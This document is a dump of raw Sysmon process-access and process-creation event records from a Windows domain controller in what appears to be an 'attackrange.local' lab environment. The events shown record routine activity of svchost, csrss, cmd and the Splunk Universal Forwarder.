13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BC00-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4325-6000-BA00-000000009A01}12721252C:\Windows\system32\cmd.exe{08A6967A-4325-6000-BC00-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.767{08A6967A-4325-6000-BC00-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4325-6000-BA00-000000009A01}1272C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.746{08A6967A-4325-6000-BB00-000000009A01}12481852C:\Windows\system32\conhost.exe{08A6967A-4325-6000-BA00-000000009A01}1272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.746{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BB00-000000009A01}1248C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.746{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.746{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BA00-000000009A01}1272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.731{08A6967A-4325-6000-B900-000000009A01}11761556C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4325-6000-BA00-000000009A01}1272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.745{08A6967A-4325-6000-BA00-000000009A01}1272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.480{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 